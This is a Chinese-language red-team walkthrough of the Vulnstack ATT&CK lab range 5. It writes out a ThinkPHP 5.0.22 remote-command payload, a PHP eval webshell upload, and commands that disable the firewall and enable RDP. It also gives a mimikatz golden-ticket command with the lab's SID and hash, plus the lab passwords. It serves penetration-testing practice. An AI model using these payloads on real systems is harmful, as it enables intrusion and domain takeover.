文章目錄
- 環境搭建
- 官方描述
- 前期資訊搜集
- 爆破前輩webshell
- ThinkPHP 5.0.22 任意命令執行getshell
- 內網資訊收集
- 內網滲透
- wmiexec 橫向
- 黃金票據
- ipc登錄
環境搭建
http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
官方描述
大家好,ATT&CK第五個攻防靶場已經出來了,此次靶場虛擬機共用兩個,一個外網一個內網,用來練習紅隊相關內容和方向,主要包括常規資訊收集、Web攻防、代碼審計、漏洞利用、內網滲透以及域滲透等相關內容學習,此靶場主要用來學習,請大家遵守網路網路安全法,
描述
虛擬機密碼
win7
sun\heart 123.com
sun\Administrator dc123.com
2008
sun\admin 2020.com
Win7雙網卡模擬內外網
紅隊思路
一、環境搭建
1.環境搭建測驗
2.資訊收集
二、漏洞利用
3.漏洞搜索與利用
4.漏洞利用Getshell
5.系統資訊收集
6.主機密碼收集
三、內網搜集
7.內網–繼續資訊收集
8.內網攻擊姿勢–MS14-058
9.內網攻擊姿勢–MS17-010
四、橫向移動
10.psexec遠控
11.內網其它主機埠
12.netsh增刪防火墻規則
五、構建通道
13.內網其它主機埠-代理轉發
六、持久控制
14.域滲透-域成員資訊收集
15.域滲透-基礎服務弱口令探測及深度利用之powershell
16.域滲透-橫向移動[wmi利用]
17.域滲透-域控實作與利用
七、痕跡清理
18、日志清理
前期資訊搜集
80 一個 ThinkPHP 5
目錄掃描得到一個前輩的大馬(真不錯)
爆破前輩webshell
拖到burp讓它自己爆,接著往下做
報錯得到ThinkPHP 版本
收集相關版本漏洞復現
ThinkPHP 5.0.22 任意命令執行getshell
payload:
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
定位網站路徑
linux 可以使用 echo 寫入檔案,win使用 php 檔案函式 file_put_contents 寫入shell
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wpsec.php&vars[1][]=%3C%3Fphp%20eval(%24_POST%5B'pwd'%5D)%3B%3F%3E
我都getshell了這個還沒跑出來,太真實了
大馬下下來看了原始碼后登錄大馬,其實密碼還是挺簡單的,我還是太菜了
大馬太垃圾了,什么都用不了,蟻劍直接就是admin權限,太爽了
內網資訊收集
arp資訊
dns資訊
內網滲透
定位域控上代理/CS
mimikatz 提取密碼
關閉防火墻,開啟RDP
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh firewall set opmode disable
橫向
17010打不動
wmiexec 橫向
黃金票據
域:SUN.com
SID:S-1-5-21-3388020223-1982701712-4030140183-500
NTLM:4709c610981029668df9d94ae48eb869
mimikatz # kerberos::golden /domain:sun.com /sid:S-1-5-21-3388020223-1982701712-4030140183-500 /user:wpsec /rc4:4709c610981029668df9d94ae48eb869 /ptt
ipc登錄
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/290789.html
標籤:其他